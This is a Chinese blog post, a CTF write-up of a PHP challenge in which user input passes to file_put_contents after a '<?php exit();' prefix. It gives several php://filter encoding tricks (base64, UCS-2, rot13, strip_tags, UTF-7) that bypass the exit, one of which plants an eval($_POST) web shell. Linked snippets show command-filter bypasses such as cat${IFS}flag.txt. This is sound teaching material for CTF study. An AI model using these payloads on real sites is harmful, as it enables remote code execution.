#对于星球一道题目的思考

最新推荐文章于 2024-04-20 13:09:46 发布
最新推荐文章于 2024-04-20 13:09:46 发布
阅读量218 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/105293885
版权

题目介绍

$filename=$_POST["filename"];
file_put_contents($filename, '<?php exit();'.$filename);
问如何getshell

  • 思路一:

    php://filter/convert.base64-encode|base64编码/resource=a.php

    这个思路不行,因为这个是同一个变量
    在php中,如果base64解码的过程中,遇到等号,后面还有内容,则返回空白(此情况仅限于写文件)
    但是可以配个strip_tags使用,下文有介绍

    顺便说一下base64解码情况
    base64解码只能是大小写字母和数字斜杠加号,其他字符会自动忽略,而且是以4位为一块

  • 思路二:

    <?php
$a = 'php://filter/convert.iconv.UCS-2LE.UCS-2BE|?<hp pvela$(P_SO[T11)] ;>?/resource=a.php';
//echo $a;
file_put_contents($a,"<?php exit();".$a);
# 每两个字符前后交换 eval($_POST[11])

  • 思路三:

    php://filter/write=string.rot13|<?cuc rpub 555;?>/resource=a.php

    但是如果开启了短标签,这样就不能使用,因为开头是<?cuc会导致语法错误
    在这里插入图片描述

  • 思路四:
    两个变量
    在这里插入图片描述
    一个变量时:

    $filename = 'php://filter/write=string.strip_tags|convert.base64-decode/resource=?>PD89cGhwaW5mbygpPz4g.php';
file_put_contents($filename,'<?php exit();'.$filename);

    在这里插入图片描述
    这儿主要用的思路就是将?>闭合前面的<?php exit();,然后用string_tags除去,而且等号这些全部在闭合的php格式里面被出去了,这样就能正常解码了~~


  • 思路五(只能在linux中使用,windws无效
    运用过滤器转换编码

    $a='php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode|AAPD9waHAgcGhwaW5mbygpOz8+/resource=Cyc1e.php'; #base64编码前补了AA,原理一样,补齐位数

    我们看一下转码后的结果

    UTF-8:php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode|AAPD9waHAgcGhwaW5mbygpOz8+/resource=Cyc1e.php
👇
UTF-7:php://filter/convert.iconv.utf-8.utf-7+AHw-convert.base64-decode+AHw-AAPD9waHAgcGhwaW5mbygpOz8+-/resource+AD0-Cyc1e.php

    这样就成功的把 = 给转了,base64编码没有受到影响,一样可以正常的解码~
    在这里插入图片描述
    所以对于base64的运用,只要找到一个能把 = 转了同时又不影响base64编码后的字符的转码方式即可

问题来源

链接
cyc1e

HyyMbb
关注
专栏目录
php://filter的各种过滤器
qq_44657899的博客
10-27 9528
文章目录0x01 String Filters 0x01 String Filters 1,string.rot13 string.rot13对字符串执行 ROT13 转换,ROT13 编码简单地使用字母表中后面第 13 个字母替换当前字母,同时忽略非字母表中的字符。 2,string.toupper string.toupper 将字符串转化为大写 3,string.tolower string.toupper 将字符串转化为小写 4,string.strip_tags string.strip_t
你好星球公司php,2020新春战疫公益CTF
weixin_28752709的博客
03-22 406
这次公益赛算是经过一个寒假的修炼后头一次大比赛了。可以发现自己确实对某些题目逐渐有些感觉。第一天错失弱智题,但是节奏还在改进。第二天注入专场ak,还意外的收获了一血,挺开心的,而且把一些没有实际操作过的知识点在题目中用了出来,算是巩固知识了吧。第三天题目就比较难了,而且意外频出。居然遇到原型链污染题目被搅屎,出现直接进题拿flag的情况......总而言之三天比赛挺精彩的,作为菜狗还是有不少收获。...
流浪星球
qq_43904786的博客
02-25 301
目录   题目描述 输入 输出 样例输入 样例输出 解析 优化 代码思考 代码 题目描述 输入 一个整数n。 输出 输出一个整数,表示最大收益 样例输入 输入样例1: 6 输入样例2: 73 样例输出 输出样例1: 9 输出样例2: 1000 解析 显然,这是一道生成树的题。 进一步来讲,题目是求“最大收益”,所以这是一道最大生成树的题。...
星球大战
yyyyrr的博客
08-04 81
好题笔记 星球大战 洛谷P1197 一道利用并查集去确定图里面连通性的问题。 看完题目,其实没有什么想法,最初先用树剖来操作,后来发现难以进行( 那么现在来正解。我们既然去删点很难,那么我们为什么不考虑考虑去重新修建呢,把每一次的操作离线处理,之后从最后一个往前去修,每一次我们用并查集去判断连通,只要修完之后多出来的边使两个集合连通,那么total–,最开始我们设每一个点都是独立的,也就是total=n-k(这里我们先把全都毁掉的结果算出来),然后就是类比的操作,最后把得出的total倒叙输出就OK了 启
星球杯实验室2022年招新第一次作业题题解
SilenceY233的博客
10-14 368
星球杯实验室2022年招新第一次作业题题解
【六十】【算法分析与设计】用一道题目解决dfs深度优先遍历,dfs中节点信息,dfs递归函数模板进入前维护出去前回溯,唯一解的剪枝飞升返回值true
最新发布
m0_74163972的博客
04-20 956
1.递归函数dfs,用同样的函数完成相同的逻辑问题,但是需要用其他遍历辅助判断当前位于那个节点。(i,j)以上都是当前节点的信息。2.每一次进入dfs维护当前节点信息,每一次出去之前回溯,消除维护的信息。row[i]++;col[j]++;//数学推导不细说,找规律//添加主要逻辑row[i]--;col[j]--;3.如果只需要找唯一解,找到即返回,找到就不用工作,找到就飞升。修改返回值,进入下一层逻辑,出口逻辑。剪枝row[i]++;col[j]++;
【小家java】一道多线程面试题引发对BlockingQueue的使用的思考
架构师:通透,才能写出好代码!
07-21 1860
在新增的Concurrent包中,BlockingQueue很好的解决了多线程中,如何高效安全“传输”数据的问题。通过这些高效并且线程安全的队列类,为我们快速搭建高质量的多线程程序带来极大的便利。本文详细介绍了BlockingQueue家庭中的所有成员,包括他们各自的功能以及常见使用场景。 题目: 面试题:有两个线程A,B, A线程每200ms就生成一个[0,100]之间的随机数, B线程每...
华为面试题目:一头牛重800kg,一座桥承重700kg,牛如何过河?天秀回答秒通过...
码农code之路
06-29 6133
一头牛重800kg,一座桥承重700kg,牛如何过河?最近随着几档职场真人秀的热播,一些职场类的话题也接二连三地被推上热搜,引起大家的广泛热议。尤其是在春招如此激烈的环境下,与招聘有关的...
星球杯实验室2022年第一次周训题解
SilenceY233的博客
10-15 305
2022年星球杯实验室招新第一次周训题解
历年美赛题目及翻译
01-05
以上仅是对部分年份题目内容的简要分析,实际上每一道题目都蕴含着丰富的知识背景和技术细节。通过深入研究这些题目,不仅可以提升自身在数学建模方面的能力,还能增进对相关领域最新进展的理解。希望以上内容能够...
六月集训(第13天) —— 双向链表
热门推荐
英雄哪里出来
06-13 1万+
6月的第13天
【洛谷】P1197 [JSOI2008]星球大战
圣帝天龙之博客传奇
10-05 259
#include&lt;iostream&gt; #include&lt;cstdio&gt; #include&lt;cstring&gt; #include&lt;algorithm&gt; #include&lt;vector&gt; #include&lt;stack&gt; using namespace std; const int maxn=400000+5; vector&lt;...
Python解答蓝桥杯省赛真题之从入门到真题(二刷题目一直更新)
李波的blog,一名喜欢编程和分享技术的研究僧~
09-13 4496
突然看到学校通知,发现蓝桥杯要考试了!!!好吧,最近忙其他事情都快忘了这个竞赛。。。二刷我之前的博客《Python解答蓝桥杯省赛真题之从入门到真题》,主要挑选了一些真题题目来做,对原先的解析做了进一步优化和简化,原文在我的GitHub:https://github.com/libo-sober/LanQiaoCup,欢迎大叫Star和Fork,一起交流。
CTF gopher协议
a3320315的博客
11-03 7319
0x01 例题 这儿举例安恒的一道月题 tips:利用ssrf,gopher打内网 0x02 贴出代码 <?php highlight_file(__FILE__); $x = $_GET['x']; $pos = strpos($x,"php"); if($pos){ exit("denied"); } $ch = curl_init(); curl_setopt($ch,...
在CTF比赛中,命令中空格被过滤的解决方法
a3320315的博客
08-19 6917
1、linux {cat,flag.txt} cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt kg=$'\x20flag.txt'&&cat$kg (\x20转换成字符串就是空格,这里通过变量的方式巧妙绕过) 2、windows下 (实用性不是很广,也就type这个命令可以用) ty...
攻防世界 Web_php_unserialize的坑
a3320315的博客
09-26 3429
题目要求传入的参数先base64解码,然后再反序列化。 题目中的class有一个私有变量,我知道最后打印出来的序列化内容会在类名前后加%00。 (ps:以前做相关序列化的题是直接GET传入参数,所以浏览器自动解码%00)但是今天我是先把%00加进去再去别的网站进行base64编码,这就是问题所在,编码时不会把%00当做一个特殊字符,结果就是死活不对。其实直接在php里面编码就行了。(菜得真实) ...
2020第五空间 web writeup
a3320315的博客
06-27 3417
hate-php 源码 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
HFCTF2020 web writeup
a3320315的博客
04-21 3090
easy_login just_escape 进入这个页面 然后显示的是一个php的任意代码执行的页面,但是经过测试,这个根本就是php,其实题目也有提示 我们输入Error().stack 可以根据回显得到,这是一个JS的vm2,而且经过测试许多关键字都被过滤 所以我们使用字符串拼接就可以了~~ 然后我们去网上找一下关于vm2的payload 所以最终的payload为: (function (...
宜居星球改造 od 题目 c算法
09-27
宜居星球改造OD(Optimal Design)题目涉及的是在将宜居星球进行改造时,需要使用的C算法。C算法是一种高级编程语言,常被用于开发系统软件、嵌入式系统以及应用软件。 在宜居星球改造的过程中,C算法可以发挥关键...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值